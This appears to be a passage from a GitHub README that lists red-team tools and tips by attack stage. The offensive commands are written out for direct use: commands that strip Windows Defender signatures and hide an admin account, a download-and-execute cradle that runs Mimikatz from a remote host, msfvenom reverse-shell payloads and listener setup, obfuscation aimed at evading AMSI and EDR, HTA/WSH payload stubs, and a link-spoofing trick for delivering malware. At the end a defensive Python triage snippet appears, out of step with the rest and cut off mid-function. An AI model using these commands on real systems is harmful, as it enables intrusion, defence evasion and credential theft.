This GitHub repository contains a collection of 130+ tools and resources that can be useful for red teaming activities.
Some of the tools are specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.
🔗 If you are a Blue Teamer, check out BlueTeam-Tools
Warning
The materials in this repository are for informational and educational purposes only. They are not intended for use in any illegal activities.
Note
Hide Tool List headings with the arrow.
Click 🔙 to get back to the list.
Red Team Tips 17 tips
- Hiding the local admin account @Alh4zr3d
- Cripple windows defender by deleting signatures @Alh4zr3d
- Enable multiple RDP sessions per user @Alh4zr3d
- Sysinternals PsExec.exe local alternative @GuhnooPlusLinux
- Live off the land port scanner @Alh4zr3d
- Proxy aware PowerShell DownloadString @Alh4zr3d
- Looking for internal endpoints in browser bookmarks @Alh4zr3d
- Query DNS records for enumeration @Alh4zr3d
- Unquoted service paths without PowerUp @Alh4zr3d
- Bypass a disabled command prompt with /k Martin Sohn Christensen
- Stop windows defender deleting mimikatz.exe @GuhnooPlusLinux
- Check if you are in a virtual machine @dmcxblue
- Enumerate AppLocker rules @Alh4zr3d
- CMD shortcut with 6 pixels via mspaint PenTestPartners
- Link spoofing with PreventDefault JavaScript method
- Check SMB firewall rules with Responder @malmoeb
- Disable AV with SysInternals PsSuspend @0gtweet
Reconnaissance 20 tools
- crt.sh -> httprobe -> EyeWitness Automated domain screenshotting
- jsendpoints Extract page DOM links
- nuclei Vulnerability scanner
- certSniff Certificate transparency log keyword sniffer
- gobuster Website path brute force
- feroxbuster Fast content discovery tool written in Rust
- CloudBrute Cloud infrastructure brute force
- dnsrecon Enumerate DNS records
- Shodan.io Public facing system knowledge base
- AORT (All in One Recon Tool) Subdomain enumeration
- spoofcheck SPF/DMARC record checker
- AWSBucketDump S3 bucket enumeration
- GitHarvester GitHub credential searcher
- truffleHog GitHub credential scanner
- Dismap Asset discovery/identification
- enum4linux Windows/samba enumeration
- skanuvaty Dangerously fast dns/network/port scanner
- Metabigor OSINT tool without API
- Gitrob GitHub sensitive information scanner
- gowitness Web screenshot utility using Chrome Headless
Resource Development 11 tools
- Chimera PowerShell obfuscation
- msfvenom Payload creation
- Shellter Dynamic shellcode injection tool
- Freeze Payload creation (circumventing EDR)
- WordSteal Steal NTLM hashes with Microsoft Word
- NTAPI Undocumented Functions Windows NT Kernel, Native API and drivers
- Kernel Callback Functions Undocumented Windows APIs
- OffensiveVBA Office macro code execution and evasion techniques
- WSH Wsh payload
- HTA Hta payload
- VBA Vba payload
Initial Access 6 tools
- Bash Bunny USB attack tool
- EvilGoPhish Phishing campaign framework
- The Social-Engineer Toolkit Phishing campaign framework
- Hydra Brute force tool
- SquarePhish OAuth/QR code phishing framework
- King Phisher Phishing campaign framework
Execution 13 tools
- Responder LLMNR, NBT-NS and MDNS poisoner
- secretsdump Remote hash dumper
- evil-winrm WinRM shell
- Donut In-memory .NET execution
- Macro_pack Macro obfuscation
- PowerSploit PowerShell script suite
- Rubeus Active directory hack tool
- SharpUp Windows vulnerability identifier
- SQLRecon Offensive MS-SQL toolkit
- UltimateAppLockerByPassList Common AppLocker Bypass Techniques
- StarFighters JavaScript and VBScript Based Empire Launcher
- demiguise HTA encryption tool
- PowerZure PowerShell framework to assess Azure security
Persistence 4 tools
- Impacket Python script suite
- Empire Post-exploitation framework
- SharPersist Windows persistence toolkit
- ligolo-ng Tunneling tool that uses a TUN interface
Privilege Escalation 10 tools
- LinPEAS Linux privilege escalation
- WinPEAS Windows privilege escalation
- linux-smart-enumeration Linux privilege escalation
- Certify Active directory privilege escalation
- Get-GPPPassword Windows password extraction
- Sherlock PowerShell privilege escalation tool
- Watson Windows privilege escalation tool
- ImpulsiveDLLHijack DLL Hijack tool
- ADFSDump AD FS dump tool
- BeRoot Multi OS Privilege Escalation Project
Defense Evasion 8 tools
- Invoke-Obfuscation Script obfuscator
- Veil Metasploit payload obfuscator
- SharpBlock EDR bypass via entry point execution prevention
- Alcatraz GUI x64 binary obfuscator
- Mangle Compiled executable manipulation
- AMSI Fail PowerShell snippets that break or disable AMSI
- ScareCrow Payload creation framework designed around EDR bypass
- moonwalk Linux system log and filesystem timestamp remover
Credential Access 11 tools
- Mimikatz Windows credential extractor
- LaZagne Local password extractor
- hashcat Password hash cracking
- John the Ripper Password hash cracking
- SCOMDecrypt SCOM Credential Decryption Tool
- nanodump LSASS process minidump creation
- eviltree Tree remake for credential discovery
- SeeYouCM-Thief Cisco phone systems configuration file parsing
- MailSniper Microsoft Exchange Mail Searcher
- SharpChromium Cookie, history and saved login chromium extractor
- dploot DPAPI looting remotely in Python
Discovery 6 tools
- PCredz Credential discovery PCAP/live interface
- PingCastle Active directory assessor
- Seatbelt Local vulnerability scanner
- ADRecon Active directory recon
- adidnsdump Active Directory Integrated DNS dumping
- scavenger Scanning tool for scavenging systems
Lateral Movement 12 tools
- crackmapexec Windows/Active directory lateral movement toolkit
- WMIOps WMI remote commands
- PowerLessShell Remote PowerShell without PowerShell
- PsExec Light-weight telnet-replacement
- LiquidSnake Fileless lateral movement
- Enabling RDP Windows RDP enable command
- Upgrading shell to meterpreter Reverse shell improvement
- Forwarding Ports Local port forward command
- Jenkins reverse shell Jenkins shell command
- ADFSpoof Forge AD FS security tokens
- kerbrute A tool to perform Kerberos pre-auth bruteforcing
- Coercer Coerce a Windows server to authenticate
Collection 3 tools
- BloodHound Active directory visualisation
- Snaffler Active directory credential collector
- linWinPwn Active Directory Enumeration and Vulnerability checks
Command and Control 9 tools
- Living Off Trusted Sites Project Leverage legitimate domains for your C2
- Havoc Command and control framework
- Covenant Command and control framework (.NET)
- Merlin Command and control framework (Golang)
- Metasploit Framework Command and control framework (Ruby)
- Pupy Command and control framework (Python)
- Brute Ratel Command and control framework ($$$)
- NimPlant C2 implant written in Nim
- Hoaxshell PowerShell reverse shell
Exfiltration 5 tools
- Dnscat2 C2 via DNS tunneling
- Cloakify Data transformation for exfiltration
- PyExfil Data exfiltration PoC
- Powershell RAT Python based backdoor
- GD-Thief Google drive exfiltration
Impact 4 tools
- Conti Pentester Guide Leak Conti ransomware group affiliate toolkit
- SlowLoris Simple denial of service
- usbkill Anti-forensic kill-switch
- Keytap Get pressed keyboard keys from typing audio
Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.
Note: Nearly all tips are currently from @Alh4zr3d, who posts good Red Team Tips!
🔙Hiding the local admin account
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f
Description: 'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'
Credit: @Alh4zr3d
Link: Twitter
🔙Cripple windows defender by deleting signatures
"%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Description: 'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'
Credit: @Alh4zr3d
Link: Twitter
🔙Enable multiple RDP sessions per user
reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f
Description: 'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'
Credit: @Alh4zr3d
Link: Twitter
🔙Sysinternals PsExec.exe local alternative
wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command "
Description: 'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'
Credit: @GuhnooPlusLinux
Link: Twitter
🔙Live off the land port scanner
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null
Description: 'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'
Credit: @Alh4zr3d
Link: Twitter
🔙Proxy aware PowerShell DownloadString
$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")
Description: 'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'
Credit: @Alh4zr3d
Link: Twitter
🔙Looking for internal endpoints in browser bookmarks
type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type"
Description: 'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'
Credit: @Alh4zr3d
Link: Twitter
🔙Query DNS records for enumeration
Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>
Description: 'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'
Credit: @Alh4zr3d
Link: Twitter
🔙Unquoted service paths without PowerUp
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Description: 'Finding unquoted service paths without PowerUp'
Credit: @Alh4zr3d
Link: Twitter
🔙Bypass a disabled command prompt with /k
# Win+R (To bring up Run Box)
cmd.exe /k "whoami"
Description: 'This command prompt has been disabled by your administrator...' can usually be seen in environments such as kiosk PCs. A quick, hacky workaround is to use /k via the Windows Run box. This will carry out the command and then show the restriction message, allowing for command execution.
Credit: Martin Sohn Christensen
Link: Blog
🔙Stop windows defender deleting mimikatz.exe
(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv
Description: 'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'
Credit: @GuhnooPlusLinux
Link: Twitter
🔙Check if you are in a virtual machine
reg query HKLM\SYSTEM /s | findstr /S "VirtualBox VBOX VMWare"
Description: 'Want to know if you are in a Virtual Machine? Query the registry Keys and find out!!! If any results show up then you are in a Virtual Machine.'
Credit: @dmcxblue
Link: Twitter
🔙Enumerate AppLocker rules
(Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
Description: 'AppLocker can be a pain. Enumerate to see how painful'
Credit: @Alh4zr3d
Link: Twitter
🔙CMD shortcut with 6 pixels via mspaint
- Open MSPaint.exe and set the canvas size to: Width=6 and Height=1 pixels
- Zoom in to make the following tasks easier
- Using the colour picker, set pixels values to (from left to right):
- 1st: R: 10, G: 0, B: 0
- 2nd: R: 13, G: 10, B: 13
- 3rd: R: 100, G: 109, B: 99
- 4th: R: 120, G: 101, B: 46
- 5th: R: 0, G: 0, B: 101
- 6th: R: 0, G: 0, B: 0
- Save it as 24-bit Bitmap (.bmp;.dib)
- Change its extension from bmp to bat and run.
Description: 'An unusual, yet effective method of gaining a shell by creating a shortcut to cmd.exe by drawing certain colours in Microsoft Paint. Due to the encoding algorithm used to write BMP files, it is possible to dictate ASCII data written into a file by carefully selecting certain RGB colours.'
Credit: PenTestPartners
Link: Blog
🔙Link spoofing with PreventDefault JavaScript method
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>PreventDefault Example</title>
</head>
<body>
<a href="https://google.com" onclick="event.preventDefault(); window.location.href = 'https://bing.com';">Go to Google</a>
</body>
</html>
Description: Threat actors have been observed using this technique to trick victims into clicking spoofed in-page malware download links. Using the PreventDefault JavaScript method you can spoof the hover link to display a legitimate link (google.com), but once clicked the victim will be redirected to your malicious link (bing.com). Great for getting victims to download payloads via a controlled site.
Link: PreventDefault Docs
🔙Check SMB firewall rules with Responder
Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$"
Description: 'When I do a Compromise Assessment, I often ask the customer if I can do a last quick check: Copy-Item -Path "C:\tmp\" -Destination "\\<ip_running_responder>\c$". If Responder could capture the hash, the firewall allows outgoing SMB connections'
Credit: @malmoeb
Link: Twitter
🔙Disable AV with SysInternals PsSuspend
Description: Using the Microsoft Sysinternals tool PsSuspend.exe it's possible to suspend some AV service executables. The Microsoft-signed tool can be passed the PID or name of a running service; it suspends the process via the NtSuspendProcess Windows API.
Related Blog Post: Bypassing AV via Process Suspension with PsSuspend.exe
Link: Twitter
🔙crt.sh -> httprobe -> EyeWitness
I have put together a bash one-liner that:
- Passively collects a list of subdomains from certificate associations (crt.sh)
- Actively requests each subdomain to verify its existence (httprobe)
- Actively screenshots each subdomain for manual review (EyeWitness)
Usage:
domain=DOMAIN_COM;rand=$RANDOM;curl -fsSL "https://crt.sh/?q=${domain}" | pup 'td text{}' | grep "${domain}" | sort -n | uniq | httprobe > /tmp/enum_tmp_${rand}.txt; python3 /usr/share/eyewitness/EyeWitness.py -f /tmp/enum_tmp_${rand}.txt --web
Note: You must have httprobe, pup and EyeWitness installed and change 'DOMAIN_COM' to the target domain. You can run this script concurrently in several terminal windows if you have multiple target root domains.
A JavaScript bookmarklet for extracting all webpage endpoint links on a page.
Created by @renniepak, this JavaScript code snippet can be used to extract all endpoints (starting with /) from the current webpage DOM including all external script sources embedded on the webpage.
javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Usage (Bookmarklet)
Create a bookmarklet...
Right click your bookmark bar
Click 'Add Page'
Paste the above Javascript in the 'url' box
Click 'Save'
...then visit the victim page in the browser and click the bookmarklet.
Usage (Console)
Paste the above Javascript into the console window (F12) and press enter.
Fast vulnerability scanner that uses .yaml templates to search for specific issues.
Install:
go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
Usage:
cat domains.txt | nuclei -t /PATH/nuclei-templates/
certSniff is a Certificate Transparency logs keyword watcher I wrote in Python. It uses the certstream library to watch for certificate creation logs that contain keywords defined in a file.
You can set this running with several keywords relating to your victim domain; any certificate creations will be recorded and may lead to the discovery of domains you were previously unaware of.
Install:
git clone https://github.com/A-poc/certSniff;cd certSniff/;pip install -r requirements.txt
Usage:
python3 certSniff.py -f example.txt
Nice tool for brute forcing file/folder paths on a victim website.
Install:
sudo apt install gobuster
Usage:
gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20
A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application but are still accessible by an attacker.
Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc.
Install: (Kali)
sudo apt update && sudo apt install -y feroxbuster
Install: (Mac)
curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash
Install: (Windows)
Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip
Expand-Archive .\feroxbuster.zip
.\feroxbuster\feroxbuster.exe -V
For full installation instructions see here.
Usage:
# Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url
./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx
# Scan with headers
./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}"
# Read URLs from stdin
cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files
# Proxy requests through burpsuite
./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080
Full usage examples can be found here.
Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif
A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).
Features:
- Cloud detection (IPINFO API and Source Code)
- Fast (concurrent)
- Cross Platform (windows, linux, mac)
- User-Agent Randomization
- Proxy Randomization (HTTP, Socks5)
Install:
Download the latest release for your system and follow the usage.
Usage:
# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
# Output results to file
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w "./data/storage_small.txt" -c amazon -o target_output.txt
Image used from https://github.com/0xsha/CloudBrute
dnsrecon is a Python tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.
Install:
sudo apt install dnsrecon
Usage:
dnsrecon -d google.com
Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name or IP address it is possible to discover potentially vulnerable systems relating to your target via Shodan.
Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.
Install:
git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt
Usage:
python3 AORT.py -d google.com
A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has a DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.
Domains are spoofable if any of the following conditions are met:
- Lack of an SPF or DMARC record
- SPF record never specifies ~all or -all
- DMARC policy is set to p=none or is nonexistent
Install:
git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt
Usage:
./spoofcheck.py [DOMAIN]
AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.
Install:
git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt
Usage:
usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]
optional arguments:
-h, --help show this help message and exit
-D Download files. This requires significant diskspace
-d If set to 1 or True, create directories for each host w/ results
-t THREADS number of threads
-l HOSTLIST
-g GREPWORDS Provide a wordlist to grep for
-m MAXSIZE Maximum file size to download.
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1
Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.
Install:
git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester
Usage:
./githarvester.py
TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.
Install (Binaries): Link
Install (Go):
git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install
Usage:
trufflehog https://github.com/trufflesecurity/test_keys
Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.
Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.
Install:
Dismap is a binary file for Linux, MacOS, and Windows. Go to Release to download the corresponding version to run:
# Linux or MacOS
chmod +x dismap-0.3-linux-amd64
./dismap-0.3-linux-amd64 -h
# Windows
dismap-0.3-windows-amd64.exe -h
Usage:
# Scan 192.168.1.1 subnet
./dismap -i 192.168.1.1/24
# Scan, output to result.txt and json output to result.json
./dismap -i 192.168.1.1/24 -o result.txt -j result.json
# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds
./dismap -i 192.168.1.1/24 --np --timeout 10
# Scan, Number of concurrent threads 1000
./dismap -i 192.168.1.1/24 -t 1000
Image used from https://github.com/zhzyker/dismap
A tool for enumerating information from Windows and Samba systems.
It can be used to gather a wide range of information, including:
- Domain and domain controller information
- Local user and group information
- Shares and share permissions
- Security policies
- Active Directory information
Install: (Apt)
sudo apt install enum4linux
Install: (Git)
git clone https://github.com/CiscoCXSecurity/enum4linux
cd enum4linux
Usage:
# 'Do everything'
enum4linux.pl -a 192.168.2.55
# Obtain list of usernames (RestrictAnonymous = 0)
enum4linux.pl -U 192.168.2.55
# Obtain list of usernames (using authentication)
enum4linux.pl -u administrator -p password -U 192.168.2.55
# Get a list of groups and their members
enum4linux.pl -G 192.168.2.55
# Verbose scan
enum4linux.pl -v 192.168.2.55
Full usage information can be found in this blog.
Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/
Dangerously fast dns/network/port scanner, created by Esc4iCEscEsc, written in Rust.
You will need a subdomains file. E.g. Subdomain wordlist by Sublist3r.
Install:
Download the latest release from here.
# Install a wordlist
sudo apt install wordlists
ls /usr/share/dirb/wordlists
ls /usr/share/amass/wordlists
Usage:
skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt
Image used from https://github.com/Esc4iCEscEsc/skanuvaty
Metabigor is an intelligence tool; its goal is to do OSINT tasks and more, but without any API key.
Main Features:
- Searching information about IP addresses, ASNs and organizations.
- Wrapper for running rustscan, masscan and nmap more efficiently on IP/CIDR ranges.
- Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc).
- Get a summary about an IP address (powered by @thebl4ckturtle)
Install:
go install github.com/j3ssie/metabigor@latest
Usage:
# discovery IP of a company/organization
echo "company" | metabigor net --org -o /tmp/result.txt
# Getting more related domains by searching for certificate info
echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command
# Only run rustscan with full ports
echo '1.2.3.4/24' | metabigor scan -o result.txt
# Reverse Whois to find related domains
echo 'example.com' | metabigor related -s 'whois'
# Get Google Analytics ID directly from the URL
echo 'https://example.com' | metabigor related -s 'google-analytic'
Image used from https://github.com/j3ssie/metabigor
Gitrob is a tool to help find potentially sensitive files pushed to public repositories on GitHub.
Gitrob will clone repositories belonging to a user or organization down to a configurable depth, iterate through the commit history and flag files that match signatures for potentially sensitive files.
The findings will be presented through a web interface for easy browsing and analysis.
Note: Gitrob will need a GitHub access token in order to interact with the GitHub API. Create a personal access token and save it in an environment variable in your .bashrc or similar shell configuration file:
export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
Install: (Go)
go get github.com/michenriksen/gitrob
Install: (Binary)
A precompiled version is available for each release.
Usage:
# Run against org
gitrob {org_name}
# Saving session to a file
gitrob -save ~/gitrob-session.json acmecorp
# Loading session from a file
gitrob -load ~/gitrob-session.json
Image used from https://www.uedbox.com/post/58828/
Gowitness is a website screenshot utility written in Golang that uses Chrome Headless to generate screenshots of web interfaces from the command line, with a handy report viewer to process results. Both Linux and macOS are supported, with Windows support mostly working.
Install: (Go)
go install github.com/sensepost/gowitness@latest
Full installation information can be found here.
Usage:
# Screenshot a single website
gowitness single https://www.google.com/
# Screenshot a cidr using 20 threads
gowitness scan --cidr 192.168.0.0/24 --threads 20
# Screenshot open http services from an nmap file
gowitness nmap -f nmap.xml --open --service-contains http
# Run the report server
gowitness report serve
Full usage information can be found here.
Image used from https://github.com/sensepost/gowitness
Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures.
Install:
sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git
sudo git clone https://github.com/tokyoneon/chimera /opt/chimera
sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/
sudo chmod +x chimera.sh; ./chimera.sh --help
Usage:
./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\
copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\
invoke-expression,out-string,write-error -j -g -k -r -p
Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass.
Set Up Listener
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run
PHP:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.9 lport=1234 R
Windows:
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
Linux:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
Java:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
HTA:
msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only).
Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan.
Full README information can be found here.
Install: (Kali)
apt-get update
apt-get install shellter
Install: (Windows)
Visit the download page and install.
Usage:
Just pick a legit binary to backdoor and run Shellter.
Some nice tips can be found here.
Lots of community usage demos can be found here.
Image used from https://www.kali.org/tools/shellter/images/shellter.png
Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner.
Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls.
Install:
git clone https://github.com/optiv/Freeze
cd Freeze
go build Freeze.go
Usage:
-I string
Path to the raw 64-bit shellcode.
-O string
Name of output file (e.g. loader.exe or loader.dll). The file extension given determines whether Freeze builds a DLL or an EXE.
-console
Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
-encrypt
Encrypts the shellcode using AES 256 encryption
-export string
For DLL Loaders Only - Specify a specific Export function for a loader to have.
-process string
The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe")
-sandbox
Enables sandbox evasion by checking:
Is Endpoint joined to a domain?
Does the Endpoint have more than 2 CPUs?
Does the Endpoint have more than 4 gigs of RAM?
-sha256
Provides the SHA256 value of the loaders (This is useful for tracking)
Image used from https://www.blackhatethicalhacking.com/tools/freeze/
This script will create a Microsoft Word document with a remote image, allowing for the capture of NTLM hashes from a remote victim endpoint.
Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image.
Install:
git clone https://github.com/0x09AL/WordSteal
cd WordSteal
Usage:
# Generate document containing 'test.jpg' and start listener
./main.py 127.0.0.1 test.jpg 1
# Generate document containing 'test.jpg' and do not start listener
./main.py 127.0.0.1 test.jpg 0
Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/
This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system.
It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation.
When developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows.
Usage:
Visit http://undocumented.ntinternals.net/
Image used from http://undocumented.ntinternals.net/
This technical note provides a comprehensive list of all the APIs exported by the Windows kernel that driver writers can use to register callback routines, which kernel components invoke under various circumstances.
Most of these routines are documented in the Windows Driver Kit (WDK), but some are undocumented and intended for use by in-box drivers.
The undocumented functions are described briefly, whereas the documented ones are just listed for reference.
Usage:
Visit https://codemachine.com/articles/kernel_callback_functions.html
Image used from https://codemachine.com
A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros.
Usage:
Visit https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo
Image used from https://github.com/S3cur3Th1sSh1t
🔙WSH
Creating payload:
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run "C:\Windows\System32\calc.exe " & WScript.ScriptFullName, 0, True
Execute:
wscript payload.vbs
cscript.exe payload.vbs
wscript /e:VBScript payload.txt //If .vbs files are blacklisted
🔙HTA
Creating payload:
<html>
<body>
<script>
var c = 'cmd.exe';
new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>
Execute: save as an .hta file and run it
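A defender-side triage check for the script-host tricks shown in the WSH and HTA entries above (wscript/cscript given an `/e:` engine override or a file without a script extension, and mshta launching an .hta). This is an added example, not code from the original list; `classify` and `triage` are hypothetical helper names, and the process command lines are constructed, not real telemetry.

```python
import shlex

# Script hosts and the extensions they are normally given on the command line.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
NORMAL_SCRIPT_EXT = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}

# Constructed process-creation command lines for testing; not real telemetry.
SAMPLE_EVENTS = [
    r'wscript.exe C:\Users\alice\payload.vbs',
    r'wscript /e:VBScript C:\Users\alice\payload.txt',
    r'cscript.exe //E:JScript "C:\Users\alice\notes.log"',
    r'mshta.exe C:\Users\alice\Downloads\invoice.hta',
    r'"C:\Program Files\App\app.exe" --quiet',
]


def _basename(path):
    """Last path component, lower-cased, with surrounding quotes removed."""
    return path.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(cmdline):
    """Return a list of findings for one command line; an empty list means nothing notable."""
    try:
        argv = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:
        argv = cmdline.split()
    if not argv:
        return []
    exe = _basename(argv[0])
    if "." not in exe:
        exe += ".exe"  # 'wscript' on the command line resolves to wscript.exe
    args = [a.strip('"') for a in argv[1:]]
    findings = []
    if exe in SCRIPT_HOSTS:
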